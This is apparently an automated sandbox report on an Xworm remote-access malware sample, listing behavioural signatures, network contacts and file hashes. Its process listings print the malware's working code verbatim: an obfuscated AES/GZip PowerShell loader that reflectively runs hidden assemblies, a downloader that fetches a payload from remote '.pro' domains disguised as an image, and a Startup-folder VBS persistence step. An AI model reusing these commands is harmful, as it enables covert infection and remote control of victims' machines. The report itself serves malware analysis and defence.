Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd';$MZYP='MadRzGindRzGModdRzGuldRzGedRzG'.Replace('dRzG', ''),'ChQdTpaQdTpngQdTpeEQdTpxteQdTpnsiQdTponQdTp'.Replace('QdTp', ''),'FGJZSroGJZSmBGJZSasGJZSeGJZS6GJZS4GJZSStrGJZSinGJZSgGJZS'.Replace('GJZS', ''),'GfsYwetfsYwCfsYwurfsYwrfsYwentfsYwProfsYwcefsYwssfsYw'.Replace('fsYw', ''),'ElPbFUePbFUmPbFUenPbFUtPbFUAtPbFU'.Replace('PbFU', ''),'InvEnKDoEnKDkeEnKD'.Replace('EnKD', ''),'Decnyejomnyejprnyejenyejssnyej'.Replace('nyej', ''),'LoaCsUjdCsUj'.Replace('CsUj', ''),'SXMnypliXMnytXMny'.Replace('XMny', ''),'ReYChsadYChsLinYChsesYChs'.Replace('YChs', ''),'TraTpWrnsTpWrfoTpWrrmTpWrFinTpWralTpWrBlTpWrockTpWr'.Replace('TpWr', ''),'CrjagKeajagKtjagKeDejagKcrjagKyjagKpjagKtorjagK'.Replace('jagK', ''),'EqqjYnqqjYtryqqjYPoiqqjYntqqjY'.Replace('qqjY', ''),'CCMrToCMrTpCMrTyToCMrT'.Replace('CMrT', '');powershell -w hidden;function lezXx($vAHtD){$fMpHn=[System.Security.Cryptography.Aes]::Create();$fMpHn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fMpHn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fMpHn.Key=[System.Convert]::($MZYP[2])('Vz0NaMXoskkNfAZDSYL9QEs4+Pg8xizh89PafV/0IEc=');$fMpHn.IV=[System.Convert]::($MZYP[2])('YYQFWZml9Xmr8vgNBAedtQ==');$LBVjX=$fMpHn.($MZYP[11])();$OrsvL=$LBVjX.($MZYP[10])($vAHtD,0,$vAHtD.Length);$LBVjX.Dispose();$fMpHn.Dispose();$OrsvL;}function UqmQx($vAHtD){$YXBBI=New-Object System.IO.MemoryStream(,$vAHtD);$DXQeR=New-Object System.IO.MemoryStream;$GSEpw=New-Object System.IO.Compression.GZipStream($YXBBI,[IO.Compression.CompressionMode]::($MZYP[6]));$GSEpw.($MZYP[13])($DXQeR);$GSEpw.Dispose();$YXBBI.Dispose();$DXQeR.Dispose();$DXQeR.ToArray();}$GbEwM=[System.IO.File]::($MZYP[9])([Console]::Title);$PQord=UqmQx (lezXx ([Convert]::($MZYP[2])([System.Linq.Enumerable]::($MZYP[4])($GbEwM, 5).Substring(2))));$GigRn=UqmQx (lezXx ([Convert]::($MZYP[2])([System.Linq.Enumerable]::($MZYP[4])($GbEwM, 6).Substring(2))));[System.Reflection.Assembly]::($MZYP[7])([byte[]]$GigRn).($MZYP[12]).($MZYP[5])($null,$null);[System.Reflection.Assembly]::($MZYP[7])([byte[]]$PQord).($MZYP[12]).($MZYP[5])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1400 --field-trial-handle=2256,i,6670388345726423024,18382795228658886258,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vbdsg.duckdns.org | udp |
| GB | 57.128.155.22:8896 | vbdsg.duckdns.org | tcp |
| US | 8.8.8.8:53 | 22.155.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.178.10:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qq2ufdci.hzq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3132-9-0x0000019A34E90000-0x0000019A34EB2000-memory.dmp
memory/3132-10-0x00007FF97B670000-0x00007FF97C131000-memory.dmp
memory/3132-12-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp
memory/3132-11-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp
memory/3132-13-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp
memory/3132-14-0x0000019A352A0000-0x0000019A352E4000-memory.dmp
memory/3132-15-0x0000019A35370000-0x0000019A353E6000-memory.dmp
memory/2184-22-0x00007FF97B670000-0x00007FF97C131000-memory.dmp
memory/2184-23-0x00000228689B0000-0x00000228689C0000-memory.dmp
memory/2184-27-0x00000228689B0000-0x00000228689C0000-memory.dmp
memory/3132-28-0x00007FF97B670000-0x00007FF97C131000-memory.dmp
memory/2184-31-0x00007FF97B670000-0x00007FF97C131000-memory.dmp
memory/3132-33-0x0000019A35250000-0x0000019A35264000-memory.dmp
memory/3132-34-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp
memory/3132-35-0x00007FF999B20000-0x00007FF999BDE000-memory.dmp
memory/3132-36-0x0000019A35260000-0x0000019A3526C000-memory.dmp
memory/3132-37-0x0000019A35270000-0x0000019A35280000-memory.dmp
memory/3132-38-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp
memory/3132-39-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp
memory/3132-40-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240412-en
Max time kernel
134s
Max time network
137s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Music.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Music.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3152 wrote to memory of 4140 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3152 wrote to memory of 4140 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4140 wrote to memory of 3304 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4140 wrote to memory of 3304 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3304 wrote to memory of 4136 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3304 wrote to memory of 4136 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTregDgTreD0DgTreIDgTreBODgTreGUDgTredwDgTretDgTreE8DgTreYgBqDgTreGUDgTreYwB0DgTreCDgTreDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBODgTreGUDgTredDgTreDgTreuDgTreFcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTrePQDgTregDgTreEcDgTreZQB0DgTreC0DgTreUgBhDgTreG4DgTreZDgTreBvDgTreG0DgTreIDgTreDgTretDgTreEkDgTrebgBwDgTreHUDgTredDgTreBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreLQBDDgTreG8DgTredQBuDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreByDgTreGUDgTredDgTreB1DgTreHIDgTrebgDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreaQBlDgTreGwDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreMgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre2DgTreDYDgTreMQDgTre1DgTreDQDgTreNwDgTreyDgTreDUDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTreZgBpDgTreGwDgTreZQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNDgTreDgTre0DgTreDQDgTreMQDgTre3DgTreDIDgTreMwDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTredDgTreBlDgTreHMDgTredDgTreBwDgTreG8DgTredwBlDgTreHIDgTrecwBoDgTreGUDgTrebDgTreBsDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTrebDgTreBhDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreZDgTreBrDgTreG0DgTrebQBJDgTreGgDgTreRgDgTrevDgTreHMDgTreZQBsDgTreGkDgTreZgDgTrevDgTreG8DgTrecgBwDgTreC4DgTreZDgTreBsDgTreGUDgTreaQBoDgTreHMDgTrebwBuDgTreGEDgTrebgDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreLDgTreDgTregDgTreCcDgTreTQB1DgTreHMDgTreaQBjDgTreCcDgTreKQDgTrepDgTreH0DgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.dkmmIhF/selif/orp.dleihsonan//:sptth', '1', 'Music'))}}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Music.vbs'"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
